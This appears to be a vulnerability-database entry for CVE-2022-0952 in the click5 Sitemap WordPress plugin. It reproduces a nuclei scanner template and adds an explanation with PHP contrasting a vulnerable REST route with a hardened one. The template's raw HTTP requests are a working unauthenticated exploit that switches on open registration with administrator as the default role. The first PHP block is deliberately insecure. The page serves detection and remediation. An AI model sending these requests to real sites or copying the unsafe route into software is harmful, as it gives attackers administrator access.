WordPress Sitemap by click5 <1.0.36 - Missing Authorization

Reported by ProjectDiscovery, 03 Jul 2026 13:39:16. Type: nuclei template. Source: github.com

id: CVE-2022-0952

info:
  name: WordPress Sitemap by click5 <1.0.36 - Missing Authorization
  author: random-robbie
  severity: high
  description: |
    WordPress Sitemap by click5 plugin before 1.0.36 is susceptible to missing authorization. The plugin does not have authorization or CSRF checks when updating options via a REST endpoint and does not ensure that the option to be updated belongs to the plugin. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
  impact: |
    An attacker can exploit this vulnerability to gain unauthorized access to sensitive information.
  remediation: |
    Update to the latest version of the WordPress Sitemap plugin by click5 (1.0.36 or higher) to fix the missing authorization issue.
  reference:
    - https://wpscan.com/vulnerability/0f694961-afab-44f9-846c-e80a0f6c768b
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0952
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/RandomRobbieBF/CVE-2022-0952
    - https://github.com/nomi-sec/PoC-in-GitHub
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2022-0952
    cwe-id: CWE-352
    epss-score: 0.13329
    epss-percentile: 0.95931
    cpe: cpe:2.3:a:sitemap_project:sitemap:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: sitemap_project
    product: sitemap
    framework: wordpress
  tags: cve,cve2022,wp,wp-plugin,sitemap,wpscan,wordpress,sitemap_project,vkev,vuln

http:
  - raw:
      - |
        POST /wp-json/click5_sitemap/API/update_html_option_AJAX HTTP/1.1
        Host: {{Hostname}}
        Content-type: application/json;charset=UTF-8

        {"users_can_register":"1"}
      - |
        POST /wp-json/click5_sitemap/API/update_html_option_AJAX HTTP/1.1
        Host: {{Hostname}}
        Content-type: application/json;charset=UTF-8

        {"default_role":"administrator"}
      - |
        POST /wp-json/click5_sitemap/API/update_html_option_AJAX HTTP/1.1
        Host: {{Hostname}}
        Content-type: application/json;charset=UTF-8

        {"users_can_register":"0"}

    matchers:
      - type: dsl
        dsl:
          - 'contains(header, "application/json")'
          - "status_code == 200"
          - "contains(body_1, 'users_can_register')"
          - "contains(body_2, 'default_role')"
        condition: and
# digest: 4a0a004730450221008f898799164763125bcfbba6ff5fadbc4df1919889ab2a3a98399cfb417e31bc022045a4a8bb63bdecc297257d4b8a55f68d861a5218474c11776d4449c7dc00111d:922c64590222798bb761d5b6d8e72950
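The advisory above describes two separate defects in one REST endpoint: no authorization or CSRF check on the route, and no check that the option being written belongs to the plugin. The following is an added illustration, not the click5 Sitemap plugin's own code, of what that shape looks like in a WordPress plugin and how a maintainer closes both gaps. The namespace `example_sitemap/v1`, the route names, the option names and the helper functions are hypothetical; `register_rest_route`, `permission_callback`, `current_user_can`, `update_option`, `WP_REST_Request::get_json_params` and `WP_Error` are real WordPress APIs.

```php
<?php
// Added illustration (hypothetical plugin code, not the click5 Sitemap plugin's source).

// --- Unsafe shape, matching the advisory's description ---------------------
// No permission_callback that checks anything, so unauthenticated requests and
// cross-site POSTs from a logged-in admin's browser both reach the callback, and
// every key in the JSON body is written to wp_options, whether or not the plugin owns it.
add_action( 'rest_api_init', function () {
    register_rest_route( 'example_sitemap/v1', '/update_html_option_unsafe', array(
        'methods'             => 'POST',
        'permission_callback' => '__return_true', // anyone may call this route
        'callback'            => function ( WP_REST_Request $request ) {
            $body = (array) $request->get_json_params();
            foreach ( $body as $option => $value ) {
                update_option( $option, $value ); // arbitrary option name from the request
            }
            return rest_ensure_response( $body );
        },
    ) );
} );

// --- Hardened shape -------------------------------------------------------
// Explicit allowlist of the options this plugin is allowed to touch (hypothetical names).
const EXAMPLE_SITEMAP_OPTIONS = array(
    'example_sitemap_html_enabled',
    'example_sitemap_html_title',
);

add_action( 'rest_api_init', function () {
    register_rest_route( 'example_sitemap/v1', '/update_html_option', array(
        'methods'             => 'POST',
        // Authorization: only users who may manage site options. For cookie-authenticated
        // requests WordPress core only establishes the current user when a valid
        // X-WP-Nonce header (action 'wp_rest') is present, so this same check also
        // rejects cross-site requests that carry cookies but no nonce.
        'permission_callback' => function () {
            return current_user_can( 'manage_options' );
        },
        'callback'            => 'example_sitemap_update_html_option',
        'args'                => array(
            'option' => array(
                'required'          => true,
                'type'              => 'string',
                'validate_callback' => 'example_sitemap_is_plugin_option',
            ),
            'value'  => array(
                'required'          => true,
                'type'              => 'string',
                'sanitize_callback' => 'sanitize_text_field',
            ),
        ),
    ) );
} );

/**
 * Ownership check: the option must be one this plugin manages.
 * Extra arguments WordPress passes to validate callbacks are ignored.
 */
function example_sitemap_is_plugin_option( $option ) {
    return is_string( $option ) && in_array( $option, EXAMPLE_SITEMAP_OPTIONS, true );
}

function example_sitemap_update_html_option( WP_REST_Request $request ) {
    $option = $request->get_param( 'option' );
    $value  = $request->get_param( 'value' );

    // Defence in depth: re-check ownership even though validate_callback already ran.
    if ( ! example_sitemap_is_plugin_option( $option ) ) {
        return new WP_Error(
            'rest_forbidden_option',
            'Option is not managed by this plugin.',
            array( 'status' => 403 )
        );
    }

    update_option( $option, $value );
    return rest_ensure_response( array( 'updated' => $option ) );
}
```

The two fixes are independent and both are needed: a capability check alone would still let an administrator's browser be coerced into writing `users_can_register` or `default_role` if the route accepted arbitrary keys, and an allowlist alone would still let an anonymous caller flip the plugin's own settings. Administrators who cannot update immediately can also watch access logs for unauthenticated `POST` requests to `/wp-json/click5_sitemap/API/update_html_option_AJAX`, which is the request the template above sends.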


Scores (as of 04 Feb 2026 07:00): Vulners AI Score 7.2 (High risk); CVSS 2 6.8; CVSS 3.1 8.8; EPSS 0.13329